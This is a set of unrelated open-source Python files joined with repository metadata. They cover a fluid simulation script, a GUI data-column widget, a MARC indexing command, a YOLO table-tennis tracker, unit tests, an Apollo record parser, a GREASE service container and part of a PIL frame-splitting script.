xl_gs = sm_gs * float(scaleFactor) if (dim==2): xl_gs.z = sm_gs.z = 1 # 2D #buoy = vec3(0,-9e-4,0) buoy = vec3(0,-1e-3,0) xl_buoy = buoy * vec3(1./scaleFactor) velOffset = vec3(0.) xl_velOffset = vec3(0.) # wlt Turbulence input fluid sm = Solver(name='smaller', gridSize = sm_gs, dim=dim) sm.timestep = 0.5 # wlt Turbulence output fluid xl = Solver(name='larger', gridSize = xl_gs, dim=dim) xl.timestep = sm.timestep # Simulation Grids -------------------------------------------------------------------# flags = sm.create(FlagGrid) vel = sm.create(MACGrid) velTmp = sm.create(MACGrid) density = sm.create(RealGrid) pressure = sm.create(RealGrid) xl_flags = xl.create(FlagGrid) xl_vel = xl.create(MACGrid) xl_velTmp = xl.create(MACGrid) xl_blurvel = xl.create(MACGrid) xl_density = xl.create(RealGrid) xl_blurden = xl.create(RealGrid) xl_pressure= xl.create(RealGrid) # open boundaries bWidth=1 flags.initDomain(boundaryWidth=bWidth) flags.fillGrid() xl_flags.initDomain(boundaryWidth=bWidth) xl_flags.fillGrid() setOpenBound(flags, bWidth,'yY',FlagOutflow|FlagEmpty) setOpenBound(xl_flags, bWidth,'yY',FlagOutflow|FlagEmpty) # inflow sources ----------------------------------------------------------------------# if(npSeed>0): np.random.seed(npSeed) # init random density noise = [] sources = [] noiseN = 12 nseeds = np.random.randint(10000,size=noiseN) cpos = vec3(0.5,0.5,0.5) randoms = np.random.rand(noiseN, 8) for nI in range(noiseN): noise.append( sm.create(NoiseField, fixedSeed= int(nseeds[nI]), loadFromFile=True) ) noise[nI].posScale = vec3( res * 0.1 * (randoms[nI][7] + 1) ) noise[nI].clamp = True noise[nI].clampNeg = 0 noise[nI].clampPos = 1.0 noise[nI].valScale = 1.0 noise[nI].valOffset = -0.01 # some gap noise[nI].timeAnim = 0.3 noise[nI].posOffset = vec3(1.5) # random offsets coff = vec3(0.4) * (vec3( randoms[nI][0], randoms[nI][1], randoms[nI][2] ) - vec3(0.5)) radius_rand = 0.035 + 0.035 * randoms[nI][3] upz = vec3(0.95)+ vec3(0.1) * vec3( randoms[nI][4], randoms[nI][5], randoms[nI][6] ) if(dim == 2): coff.z = 0.0 upz.z = 1.0 if( nI%2 == 0 ): sources.append(xl.create(Cylinder, center=xl_gs*(cpos+coff), radius=xl_gs.x*radius_rand, \ z=xl_gs*radius_rand*upz)) else: sources.append(xl.create(Sphere, center=xl_gs*(cpos+coff), radius=xl_gs.x*radius_rand, scale=upz)) print (nI, "centre", xl_gs*(cpos+coff), "radius", xl_gs.x*radius_rand, "other", upz ) densityInflow( flags=xl_flags, density=xl_density, noise=noise[nI], shape=sources[nI], scale=1.0, sigma=1.0 ) # init random velocity Vrandom = np.random.rand(3) v1pos = vec3(0.7 + 0.4 *(Vrandom[0] - 0.5) ) #range(0.5,0.9) v2pos = vec3(0.3 + 0.4 *(Vrandom[1] - 0.5) ) #range(0.1,0.5) vtheta = Vrandom[2] * math.pi * 0.5 velInflow = 0.04 * vec3(math.sin(vtheta), math.cos(vtheta), 0) if(dim == 2): v1pos.z = v2pos.z = 0.5 xl_sourcV1 = xl.create(Sphere, center=xl_gs*v1pos, radius=xl_gs.x*0.1, scale=vec3(1)) xl_sourcV2 = xl.create(Sphere, center=xl_gs*v2pos, radius=xl_gs.x*0.1, scale=vec3(1)) xl_sourcV1.applyToGrid( grid=xl_vel , value=(-velInflow*float(xl_gs.x)) ) xl_sourcV2.applyToGrid( grid=xl_vel , value=( velInflow*float(xl_gs.x)) ) elif(dim == 3): VrandomMore = np.random.rand(3) vtheta2 = VrandomMore[0] * math.pi * 0.5 vtheta3 = VrandomMore[1] * math.pi * 0.5 vtheta4 = VrandomMore[2] * math.pi * 0.5 for dz in range(1,10,1): v1pos.z = v2pos.z = (0.1*dz) vtheta_xy = vtheta *(1.0 - 0.1*dz ) + vtheta2 * (0.1*dz) vtheta_z = vtheta3 *(1.0 - 0.1*dz ) + vtheta4 * (0.1*dz) velInflow = 0.04 * vec3( math.cos(vtheta_z) * math.sin(vtheta_xy), math.cos(vtheta_z) * math.cos(vtheta_xy), math.sin(vtheta_z)) xl_sourcV1 = xl.create(Sphere, center=xl_gs*v1pos, radius=xl_gs.x*0.1, scale=vec3(1)) xl_sourcV2 = xl.create(Sphere, center=xl_gs*v2pos, radius=xl_gs.x*0.1, scale=vec3(1)) xl_sourcV1.applyToGrid( grid=xl_vel , value=(-velInflow*float(xl_gs.x)) ) xl_sourcV2.applyToGrid( grid=xl_vel , value=( velInflow*float(xl_gs.x)) ) blurSig = float(scaleFactor) / 3.544908 # 3.544908 = 2 * sqrt( PI ) xl_blurden.copyFrom( xl_density ) # todo blurRealGrid( xl_density, xl_blurden, blurSig) interpolateGrid( target=density, source=xl_blurden ) xl_blurvel.copyFrom( xl_vel ) # todo blurMacGrid( xl_vel, xl_blurvel, blurSig) interpolateMACGrid( target=vel, source=xl_blurvel ) vel.multConst( vec3(1./scaleFactor) ) printBuildInfo() # Setup UI ---------------------------------------------------------------------# if (showGui and GUI): gui=Gui() gui.show() gui.pause() if savedata: simPath, simNo = ph.getNextSimPath(simNo, basePath) sys.stdout = ph.Logger(simPath) t = 0 resetN = 20 # main loop --------------------------------------------------------------------# while t < steps+offset: curt = t * sm.timestep mantaMsg( "Current time t: " + str(curt) +" \n" ) newCentre = calcCenterOfMass(xl_density) xl_velOffset = xl_gs*float(0.5) - newCentre xl_velOffset = xl_velOffset * (1./ xl.timestep) velOffset = xl_velOffset * (1./ float(scaleFactor)) #velOffset = xl_velOffset = vec3(0.0) # re-centering off if(dim == 2): xl_velOffset.z = velOffset.z = 0.0 # high res fluid advectSemiLagrange(flags=xl_flags, vel=xl_velTmp, grid=xl_vel, order=2, openBounds=True, boundaryWidth=bWidth) setWallBcs(flags=xl_flags, vel=xl_vel) addBuoyancy(density=xl_density, vel=xl_vel, gravity=buoy , flags=xl_flags) if 1 and ( t< offset ): vorticityConfinement( vel=xl_vel, flags=xl_flags, strength=0.05 ) solvePressure(flags=xl_flags, vel=xl_vel, pressure=xl_pressure , cgMaxIterFac=10.0, cgAccuracy=0.0001 ) setWallBcs(flags=xl_flags, vel=xl_vel) xl_velTmp.copyFrom( xl_vel ) xl_velTmp.addConst( xl_velOffset ) if( dim == 2 ): xl_vel.multConst( vec3(1.0,1.0,0.0) ) xl_velTmp.multConst( vec3(1.0,1.0,0.0) ) advectSemiLagrange(flags=xl_flags, vel=xl_velTmp, grid=xl_density, order=2, openBounds=True, boundaryWidth=bWidth) xl_density.clamp(0.0, 2.0) # low res fluid, velocity if( t % resetN == 0) : xl_blurvel.copyFrom( xl_vel ) # optional blurMacGrid( xl_vel, xl_blurvel, blurSig) interpolateMACGrid( target=vel, source=xl_blurvel ) vel.multConst( vec3(1./scaleFactor) ) else: advectSemiLagrange(flags=flags, vel=velTmp, grid=vel, order=2, openBounds=True, boundaryWidth=bWidth) setWallBcs(flags=flags, vel=vel) addBuoyancy(density=density, vel=vel, gravity=xl_buoy , flags=flags) if 1 and ( t< offset ): vorticityConfinement( vel=vel, flags=flags, strength=0.05/scaleFactor ) solvePressure(flags=flags, vel=vel, pressure=pressure , cgMaxIterFac=10.0, cgAccuracy=0.0001 ) setWallBcs(flags=flags, vel=vel) velTmp.copyFrom(vel) velTmp.addConst( velOffset ) # low res fluid, density if( t % resetN == 0) : xl_blurden.copyFrom( xl_density ) # optional blurRealGrid( xl_density, xl_blurden, blurSig) interpolateGrid( target=density, source=xl_blurden ) else: advectSemiLagrange(flags=flags, vel=velTmp, grid=density, order=2, openBounds=True, boundaryWidth=bWidth) density.clamp(0.0, 2.0) # save low and high res # save all frames if savedata and t>=offset and (t-offset)%interval==0: tf = (t-offset)/interval framePath = simPath + 'frame_%04d/' % tf os.makedirs(framePath) density.save(framePath + 'density_low_%04d_%04d.uni' % (simNo, tf)) vel.save(framePath + 'vel_low_%04d_%04d.uni' % (simNo, tf)) xl_density.save(framePath + 'density_high_%04d_%04d.uni' % (simNo, tf)) if(saveppm): projectPpmFull( xl_density, simPath + 'density_high_%04d_%04d.ppm' % (simNo, tf), 0, 1.0 ) projectPpmFull( density, simPath + 'density_low_%04d_%04d.ppm' % (simNo, tf), 0, 1.0 ) sm.step() #gui.screenshot( 'outLibt1_%04d.png' % t ) xl.step() t = t+1
35.177606
131
0.636922
5f8cf6b5a7d4aaf3580dd8849bfb22930268fb95
6,128
py
Python
src/eddington_gui/boxes/data_columns_box.py
saroad2/eddington-gui
c5bbf7686c1964ca179e52348db324eeded1ee65
[ "Apache-2.0" ]
6
2020-09-26T18:31:06.000Z
2022-02-14T14:15:02.000Z
src/eddington_gui/boxes/data_columns_box.py
saroad2/eddington-gui
c5bbf7686c1964ca179e52348db324eeded1ee65
[ "Apache-2.0" ]
44
2020-08-07T11:50:27.000Z
2022-02-26T16:00:03.000Z
src/eddington_gui/boxes/data_columns_box.py
saroad2/eddington-gui
c5bbf7686c1964ca179e52348db324eeded1ee65
[ "Apache-2.0" ]
5
2020-08-10T09:41:04.000Z
2020-10-17T10:51:23.000Z
"""Box for choosing which columns to use in data dictionary.""" from typing import Callable, List, Optional import toga from eddington import FittingData from toga.style import Pack from toga.style.pack import LEFT from eddington_gui.boxes.line_box import LineBox from eddington_gui.util import value_or_none class DataColumnsBox(LineBox): # pylint: disable=too-many-instance-attributes """Visual box instance for choosing columns.""" __items: List[str] = [] __selection_enabled: bool = False x_selection: toga.Selection xerr_selection: toga.Selection y_selection: toga.Selection yerr_selection: toga.Selection __fitting_data: Optional[FittingData] __on_columns_change: Optional[Callable[[FittingData], None]] __handlers: List[Callable] def __init__(self, on_columns_change): """Initialize box.""" super().__init__() self.__fitting_data = None self.__handlers = [] self.on_columns_change = None self.x_selection = self.__add_column_option( label="X column:", on_select=lambda widget: self.set_columns() ) self.xerr_selection = self.__add_column_option( label="X error column:", on_select=lambda widget: self.set_columns() ) self.y_selection = self.__add_column_option( label="Y column:", on_select=lambda widget: self.set_columns() ) self.yerr_selection = self.__add_column_option( label="Y error column:", on_select=lambda widget: self.set_columns() ) self.on_columns_change = on_columns_change @property def fitting_data(self): """Fit data getter.""" return self.__fitting_data @fitting_data.setter def fitting_data(self, fitting_data: FittingData): """ Fit data setter. If fit data is None, reset all selections """ self.__fitting_data = fitting_data if fitting_data is None: self.clear_selections() return items = list(fitting_data.data.keys()) used_columns = self.fitting_data.used_columns self.set_items(self.x_selection, items, used_columns.x) self.set_items(self.xerr_selection, items, used_columns.xerr) self.set_items(self.y_selection, items, used_columns.y) self.set_items(self.yerr_selection, items, used_columns.yerr) self.selection_enabled = True self.set_columns() @property def on_columns_change(self) -> Optional[Callable]: """on_columns_change getter.""" return self.__on_columns_change @on_columns_change.setter def on_columns_change(self, on_columns_change): """on_columns_change setter.""" self.__on_columns_change = on_columns_change @property def x_column(self): """X column name value.""" return value_or_none(self.x_selection.value) @property def xerr_column(self): """X error column name value.""" return value_or_none(self.xerr_selection.value) @property def y_column(self): """Y column name value.""" return value_or_none(self.y_selection.value) @property def yerr_column(self): """Y error column name value.""" return value_or_none(self.yerr_selection.value) @property def selection_enabled(self): """Boolean. is selection enabled for columns.""" return self.__selection_enabled @selection_enabled.setter def selection_enabled(self, selection_enabled): """Set selection enabled for all column selection widgets.""" self.__selection_enabled = selection_enabled self.x_selection.enabled = selection_enabled self.xerr_selection.enabled = selection_enabled self.y_selection.enabled = selection_enabled self.yerr_selection.enabled = selection_enabled @staticmethod def set_items(selection, items, value): """ Set items and value in selection widget. :param selection: Selection widget :param items: list of options for the widget :param value: selected value """ selection.items = items if value is not None: selection.value = value def clear_selections(self): """Clear all selections.""" self.selection_enabled = False self.set_items(self.x_selection, [], None) self.set_items(self.xerr_selection, [], None) self.set_items(self.y_selection, [], None) self.set_items(self.yerr_selection, [], None) self.run_on_columns_change() def set_columns(self): # pylint: disable=unused-argument """Set columns of the fit data based on the selection of the user.""" if not self.selection_enabled: return self.fitting_data.x_column = self.x_selection.value self.fitting_data.xerr_column = self.xerr_selection.value self.fitting_data.y_column = self.y_selection.value self.fitting_data.yerr_column = self.yerr_selection.value self.run_on_columns_change() def run_on_columns_change(self): """If on_columns_change is not None, runs it.""" if self.on_columns_change is not None: self.on_columns_change(self.fitting_data) # pylint: disable=not-callable def read_csv(self, filepath): """ Read data from csv file. :param filepath: path of the csv file """ self.fitting_data = FittingData.read_from_csv(filepath) def read_excel(self, filepath, sheet): """ Read data from excel file. :param filepath: path of the excel file :param sheet: sheet from which to read the data. """ self.fitting_data = FittingData.read_from_excel(filepath, sheet) def __add_column_option(self, label, on_select): self.add(toga.Label(text=label)) selection = toga.Selection( enabled=self.selection_enabled, on_select=on_select, style=Pack(alignment=LEFT), ) self.add(selection) return selection
33.67033
85
0.662369
23c69e7cf1ad34fbf43d12844419032bfa4856b7
1,345
py
Python
aristotle/management/commands/load_authorities.py
jermnelson/aristotle-library-apps
f742847cd20c5b5c3b46dd53dfc395a2e1caa240
[ "Apache-2.0" ]
2
2015-03-30T16:36:51.000Z
2016-06-15T01:39:47.000Z
aristotle/management/commands/load_authorities.py
jermnelson/aristotle-library-apps
f742847cd20c5b5c3b46dd53dfc395a2e1caa240
[ "Apache-2.0" ]
2
2021-06-10T17:43:54.000Z
2021-12-13T19:40:08.000Z
aristotle/management/commands/load_authorities.py
jermnelson/aristotle-library-apps
f742847cd20c5b5c3b46dd53dfc395a2e1caa240
[ "Apache-2.0" ]
1
2015-11-08T00:40:11.000Z
2015-11-08T00:40:11.000Z
"""Management commands loads title, Person, and Subject authorities into the Redis Library Services Platform""" __author__ = "Jeremy Nelson" import datetime import os import sys from aristotle.settings import REDIS_DATASTORE, PROJECT_HOME from django.core.management.base import BaseCommand, CommandError def __index_titles__(**kwargs): redis_ds = kwargs.get('redis_datastore', REDIS_DATASTORE) filename = kwargs.get('filename', None) if filename is None: return title_authorities = pymarc.MARCReader( open(filepath, 'rb'), to_unicode=True) start_time = datetime.datetime.utcnow() print("Started title indexing at {0}".format(start_time.isoformat())) for i, rec in enumerate(title_authorities): index_marc(record=rec, redis_datastore=rlsp_ds) if not i%100: sys.stderr.write(".") if not i%1000: print(i) end_time = datetime.datetime.utcnow() print("End title indexing at {0}, total-time={1}".format( end_time.isoformat(), end_time-start_time)) class Command(BaseCommand): args = '' help = "Indexes Title, Person, and Subject into RLSP and Whoosh indicies" def handle(self, *args, **options): __index_titles__(**options)
30.568182
77
0.649814
30b36cda93d35d15abd9fd441aa18c020b511148
5,300
py
Python
client/darknet_video.py
akauble/cv-pong
eaa36222583caa7fcb4d8557ea1c9e28b92d6cec
[ "MIT" ]
null
null
null
client/darknet_video.py
akauble/cv-pong
eaa36222583caa7fcb4d8557ea1c9e28b92d6cec
[ "MIT" ]
null
null
null
client/darknet_video.py
akauble/cv-pong
eaa36222583caa7fcb4d8557ea1c9e28b92d6cec
[ "MIT" ]
null
null
null
from ctypes import * from util import * from GameState import * import math import random import os import cv2 import numpy as np import time import darknet import argparse def cvDrawBoxes(bestpt1, bestpt2, img): cv2.rectangle(img, bestpt1, bestpt2, (0, 255, 0), 1) return img netMain = None metaMain = None altNames = None player1Name = "" player2Name = "" maxScore = 11 tableBoundariesSet= [] # mouse callback function def draw_boundary(event,x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: if len(tableBoundariesSet) !=6: tableBoundariesSet.append((x,y)) # print(tableBoundariesSet) def YOLO(): ap = argparse.ArgumentParser() ap = argparse.ArgumentParser() ap.add_argument("-p1", "--player1", required=True, help="player 1 name") ap.add_argument("-p2", "--player2", required=True, help="player 2 name") ap.add_argument("-s", "--score", type=float, default=11, help="max score (11, 21)") ap.add_argument("-sv", "--server", required=True, help="server name") args = vars(ap.parse_args()) p1name = args["player1"] p2name = args["player2"] maxScore = args["score"] server = args["server"] global metaMain, netMain, altNames configPath = "yolov3-tiny.cfg" weightPath = "420.weights" metaPath = "obj.data" if not os.path.exists(configPath): raise ValueError("Invalid config path `" + os.path.abspath(configPath)+"`") if not os.path.exists(weightPath): raise ValueError("Invalid weight path `" + os.path.abspath(weightPath)+"`") if not os.path.exists(metaPath): raise ValueError("Invalid data file path `" + os.path.abspath(metaPath)+"`") if netMain is None: netMain = darknet.load_net_custom(configPath.encode( "ascii"), weightPath.encode("ascii"), 0, 1) # batch size = 1 if metaMain is None: metaMain = darknet.load_meta(metaPath.encode("ascii")) if altNames is None: try: with open(metaPath) as metaFH: metaContents = metaFH.read() import re match = re.search("names *= *(.*)$", metaContents, re.IGNORECASE | re.MULTILINE) if match: result = match.group(1) else: result = None try: if os.path.exists(result): with open(result) as namesFH: namesList = namesFH.read().strip().split("\n") altNames = [x.strip() for x in namesList] except TypeError: pass except Exception: pass cap = cv2.VideoCapture(0) cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280) cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720) cap.set(cv2.CAP_PROP_SETTINGS, 1) cv2.namedWindow('Demo') cv2.setMouseCallback('Demo',draw_boundary) out = cv2.VideoWriter("output.avi", cv2.VideoWriter_fourcc(*"MJPG"), 10.0, (darknet.network_width(netMain), darknet.network_height(netMain))) print("Starting the YOLO loop...") # Create an image we reuse for each detect darknet_image = darknet.make_image(darknet.network_width(netMain), darknet.network_height(netMain),3) # setup initial boundaries ret, frame_read = cap.read() frame_resized = cv2.resize(frame_read, (darknet.network_width(netMain), darknet.network_height(netMain)), interpolation=cv2.INTER_LINEAR) cv2.imshow('Demo', frame_resized) while len(tableBoundariesSet) != 6: cv2.waitKey(1) state = GameState() state.setMetaData(server, p1name, p2name) while True: prev_time = time.time() ret, frame_read = cap.read() frame_rgb = cv2.cvtColor(frame_read, cv2.COLOR_BGR2RGB) frame_resized = cv2.resize(frame_rgb, (darknet.network_width(netMain), darknet.network_height(netMain)), interpolation=cv2.INTER_LINEAR) darknet.copy_image_from_bytes(darknet_image,frame_resized.tobytes()) detections = darknet.detect_image(netMain, metaMain, darknet_image, thresh=0.75) bestpt1, bestpt2 = detectionHandler(detections, frame_resized) ballLocation = getCenterPoint(bestpt1[0], bestpt1[1], bestpt2[0], bestpt2[1]) image = cvDrawBoxes(bestpt1, bestpt2, frame_resized) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # if isBallOnTable(ballLocation) and col_det(ballLocation): # state.addBounce() # cv2.circle(image,ballLocation, 12, (0,0,255), -1) if isBallOnTable(ballLocation): addBallLocation(ballLocation, image) #get ball side tableSide = getTableSide(ballLocation) if tableSide != "": if state.side != tableSide: #it changed side didBounce = colDetection2() if didBounce: print("it bounced") else: print("no bounce detected") resetLocations() state.updateSide(tableSide) scoreP1, scoreP2 = state.tick() if state.getHighestScore() == maxScore: state.endGame() break; #draw ball side tableBoundaryHandler(image, tableBoundariesSet) if tableSide == "left": cv2.putText(image, tableSide, (200, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255)) else: cv2.putText(image, tableSide, (375, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255)) cv2.putText(image, str(player1Name) + " " + str(scoreP1), (100, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255)) cv2.putText(image, str(player2Name) + " " + str(scoreP2), (300, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255)) out.write(image) cv2.imshow('Demo', image) if cv2.waitKey(20) & 0xFF == 27: break # cv2.waitKey(3) cap.release() out.release() if __name__ == "__main__": YOLO()
29.120879
142
0.695849
64fdd7b34275285ced47e7072f8b134d5a3f0eae
1,968
py
Python
tests/prodmodel/rules/test_rules.py
prodmodel/prodmodel
83aad9a2e3f07b182a8e90ea0d92580cb2e949fe
[ "Apache-2.0" ]
53
2019-04-28T03:50:05.000Z
2022-02-04T21:52:51.000Z
tests/prodmodel/rules/test_rules.py
prodmodel/prodmodel
83aad9a2e3f07b182a8e90ea0d92580cb2e949fe
[ "Apache-2.0" ]
17
2019-04-25T01:46:46.000Z
2019-07-15T02:58:02.000Z
tests/prodmodel/rules/test_rules.py
prodmodel/prodmodel
83aad9a2e3f07b182a8e90ea0d92580cb2e949fe
[ "Apache-2.0" ]
3
2019-06-20T07:47:23.000Z
2021-09-06T07:21:51.000Z
import unittest from prodmodel.rules import rules as undertest class TestRules(unittest.TestCase): def test_data_stream(self): target = undertest.data_stream(file='/home/abc/x.json', data_type='json') self.assertEqual('JSONDataTarget', target.__class__.__name__) def test_data_file(self): target = undertest.data_file(file='/home/abc/x.dat') self.assertEqual('BinaryDataTarget', target.__class__.__name__) def _data_stream(self): return undertest.data_stream(file='/home/abc/x.json', data_type='json') def test_split(self): train_x, train_y, test_x, test_y = undertest.split(data=self._data_stream(), test_ratio=0.5, target_column='x') self.assertEqual('SelectDataTarget', train_x.__class__.__name__) self.assertEqual('SelectDataTarget', train_y.__class__.__name__) self.assertEqual('SelectDataTarget', test_x.__class__.__name__) self.assertEqual('SelectDataTarget', test_y.__class__.__name__) def test_transform_stream(self): target = undertest.transform_stream(file='/home/abc/x.py', fn='tf', stream=self._data_stream()) self.assertEqual('TransformStreamDataTarget', target.__class__.__name__) def test_transform(self): target = undertest.transform(file='/home/abc/x.py', fn='tf', streams={'s': self._data_stream()}) self.assertEqual('TransformDataTarget', target.__class__.__name__) def test_create_label_encoder(self): target = undertest.create_label_encoder(data=self._data_stream(), columns=['x']) self.assertEqual('LabelEncoderTarget', target.__class__.__name__) def test_encode_labels(self): le = undertest.create_label_encoder(data=self._data_stream(), columns=['x']) target = undertest.encode_labels(data=self._data_stream(), label_encoder=le) self.assertEqual('EncodeLabelDataTarget', target.__class__.__name__) def test_test(self): target = undertest.test(test_file='/home/abc/x.py') self.assertEqual('TestTarget', target.__class__.__name__)
42.782609
115
0.756098
49d9f2646838cfb3998ada2a7ce98d0655b008ee
4,546
py
Python
modules/tools/record_parse_save/record_parse_save.py
GaoPenghao/apollo
c80ff99a1478b1709f434639fe29a2b2f43ad516
[ "Apache-2.0" ]
null
null
null
modules/tools/record_parse_save/record_parse_save.py
GaoPenghao/apollo
c80ff99a1478b1709f434639fe29a2b2f43ad516
[ "Apache-2.0" ]
null
null
null
modules/tools/record_parse_save/record_parse_save.py
GaoPenghao/apollo
c80ff99a1478b1709f434639fe29a2b2f43ad516
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 ############################################################################### # Copyright 2018 The Apollo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### """ function to parse data from *.record files, created using Apollo-Auto current implementation illustrates sample record file parsing for * radar (Continental ars-408) * camera (Leopard Imaging 6mm) * lidar (Velodyne vls-128) * saves extracted images in separate folder using *.jpg format * saves radar and lidar data in respective folders in *.txt format for each scan * also saves timestamp in separate text files """ import os import sys import time from importlib import import_module import yaml from cyber.python.cyber_py3 import cyber from cyber.python.cyber_py3 import record os.system('clear') def read_parameters(yaml_file): """ function to read YAML parameter file and define output destinations """ with open(yaml_file, 'r') as f: params = yaml.safe_load(f) # record file params RECORD_FOLDER = params['records']['filepath'] parse_type = params['parse'] # define destinations dest_path = os.path.split(RECORD_FOLDER) if not dest_path[-1]: dest_path = os.path.split(dest_path[0]) OUT_FOLDER = dest_path[0] + '/' temp_path = os.path.split(dest_path[0]) FOLDER_PREFIX = temp_path[1].replace("-", "") parse_dict = {"params": params, "parse_type": parse_type, "out_folder": OUT_FOLDER, "prefix": FOLDER_PREFIX, "record_folder": RECORD_FOLDER} return parse_dict def define_destinations(parse_dict): """ define destination for extracted files """ dest_dict = { "channel_name": "", "timestamp_file": "", "destination_folder": "" } parse_type = parse_dict["parse_type"] params = parse_dict["params"] dest_folder = parse_dict["out_folder"] prefix = parse_dict["prefix"] # 选择解析函数,比如 parse_planning parser_func = 'parse_' + parse_type dest_dict['channel_name'] = params[parse_type]['channel_name'] dest_dict['timestamp_file'] = dest_folder + prefix + params[parse_type]['timestamp_file_extn'] dest_dict['destination_folder'] = dest_folder + \ prefix + params[parse_type]['out_folder_extn'] + '/' if not os.path.exists(dest_dict["destination_folder"]): os.makedirs(dest_dict["destination_folder"]) return dest_dict, parser_func def parse_apollo_record(parse_dict, dest_dict, parser_func): """ """ record_folder_path = parse_dict["record_folder"] parse_type = parse_dict["parse_type"] record_files = sorted(os.listdir(parse_dict["record_folder"])) parse_timestamp = [] parse_mod = import_module(parser_func) print("=" * 60) print('--------- Parsing data for: ' + parse_type + ' ---------') for rfile in record_files: print("=" * 60) print("parsing record file: %s" % rfile) freader = record.RecordReader(record_folder_path + rfile) time.sleep(.025) for channelname, msg, datatype, timestamp in freader.read_messages(): if channelname == dest_dict["channel_name"]: tstamp = parse_mod.parse_data(channelname, msg, dest_dict['destination_folder']) parse_timestamp.append(tstamp) # write radar-timestamp files with open(dest_dict["timestamp_file"], 'w+') as f: for item in parse_timestamp: f.write("%s\n" % item) print("=" * 60) print('DONE: records parsed and data saved to: \n ' + dest_dict['destination_folder']) print("=" * 60) if __name__ == '__main__': cyber.init() parse_dict = read_parameters('modules/tools/record_parse_save/parser_params.yaml') dest_dict, parser_func = define_destinations(parse_dict) parse_apollo_record(parse_dict, dest_dict, parser_func) cyber.shutdown()
32.471429
98
0.653982
4ca5e38670aec6fdcba92a603f6fd320a36d7318
3,815
py
Python
tgt_grease/core/InversionOfControl.py
jairamd22/grease
7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899
[ "MIT" ]
44
2017-09-29T00:53:44.000Z
2020-12-20T13:43:49.000Z
tgt_grease/core/InversionOfControl.py
jairamd22/grease
7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899
[ "MIT" ]
39
2017-09-29T10:26:10.000Z
2019-05-02T21:07:59.000Z
tgt_grease/core/InversionOfControl.py
jairamd22/grease
7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899
[ "MIT" ]
26
2017-09-28T18:00:39.000Z
2021-10-17T15:14:39.000Z
from tgt_grease.core import Logging from tgt_grease.core.Connectivity import Mongo from datetime import datetime from bson.objectid import ObjectId import platform import os class GreaseContainer(object): """Inversion of Control Container for objects in GREASE""" def __init__(self, *args, **kwargs): if args or kwargs: self.getLogger().warning( "Passing instances of Logger to the IOC is deprecated. Please just use getLogger().", verbose=True ) self.__logger = None self.__mongo = None def getLogger(self): """Get the logging instance Returns: Logging: The logging instance """ if not isinstance(self.__logger, Logging): self.__logger = Logging() return self.__logger def getNotification(self): """Get the notifications instance Returns: tgt_grease.core.Notifications: The notifications instance """ return self.getLogger().getNotification() def getMongo(self): """Get the Mongo instance Returns: Mongo: Mongo Instance Connection """ if not isinstance(self.__mongo, Mongo): self.__mongo = Mongo(self.getLogger().getConfig()) return self.__mongo def getCollection(self, collectionName): """Get a collection object from MongoDB Args: collectionName (str): Collection to get Returns: pymongo.collection.Collection: Collection instance """ return self.getMongo()\ .Client()\ .get_database(self.getConfig().get('Connectivity', 'MongoDB').get('db', 'grease'))\ .get_collection(collectionName) def getConfig(self): """Gets the Configuration Instance Returns: tgt_grease.core.Configuration.Configuration: the configuration instance """ return self.getLogger().getConfig() def ensureRegistration(self): """ :return: """ collection = self.getCollection("JobServer") if os.path.isfile(self.getConfig().greaseDir + 'grease.identity'): # check to see if identity file is valid fil = open(self.getConfig().greaseDir + 'grease.identity', 'r') nodeId = "".join(fil.read()) fil.close() server = collection.find_one({'_id': ObjectId(nodeId)}) if server: # Valid registration self.getConfig().NodeIdentity = nodeId return True else: self.getLogger().warning("Invalid node identity found to exist!") if self.getConfig().NodeIdentity == "Unknown": # Actual registration uid = collection.insert_one({ 'jobs': 0, 'os': platform.system().lower(), 'roles': ["general"], 'prototypes': ["monitor"], 'active': True, 'activationTime': datetime.utcnow() }).inserted_id fil = open(self.getConfig().greaseDir + "grease.identity", "w") fil.write(str(uid)) fil.close() self.getConfig().NodeIdentity = uid del collection return True else: # Check the Identity is actually registered if collection.find({'_id': ObjectId(self.getConfig().NodeIdentity)}).count(): del collection return True else: self.getLogger().error("Invalid Node Identity::Node Identity Not Found", additional={ 'NodeID': self.getConfig().NodeIdentity }) del collection return False
30.766129
114
0.563827
da84f821a2169001f5abe07ac1fe6d44bed0dd29
2,489
py
Python
py34env/Scripts/explode.py
EKiefer/edge-starter
cc1bbac3fb7191b16eeca03b2a596d232b4ece7f
[ "MIT" ]
null
null
null
py34env/Scripts/explode.py
EKiefer/edge-starter
cc1bbac3fb7191b16eeca03b2a596d232b4ece7f
[ "MIT" ]
null
null
null
py34env/Scripts/explode.py
EKiefer/edge-starter
cc1bbac3fb7191b16eeca03b2a596d232b4ece7f
[ "MIT" ]
null
null
null
#!c:\users\ekiefer\projects\django\my_edge\py34env\scripts\python.exe # # The Python Imaging Library # $Id$ # # split an animation into a number of frame files # from __future__ import print_function from PIL import Image import os import sys class Interval(object): def __init__(self, interval="0"): self.setinterval(interval) def setinterval(self, interval): self.hilo = [] for s in interval.split(","): if not s.strip(): continue try: v = int(s) if v < 0: lo, hi = 0, -v else: lo = hi = v except ValueError: i = s.find("-") lo, hi = int(s[:i]), int(s[i+1:]) self.hilo.append((hi, lo)) if not self.hilo: self.hilo = [(sys.maxsize, 0)] def __getitem__(self, index): for hi, lo in self.hilo: if hi >= index >= lo: return 1 return 0 # -------------------------------------------------------------------- # main program html = 0 if sys.argv[1:2] == ["-h"]: html = 1 del sys.argv[1] if not sys.argv[2:]: print() print("Syntax: python explode.py infile template [range]") print() print("The template argument is used to construct the names of the") print("individual frame files. The frames are numbered file001.ext,") 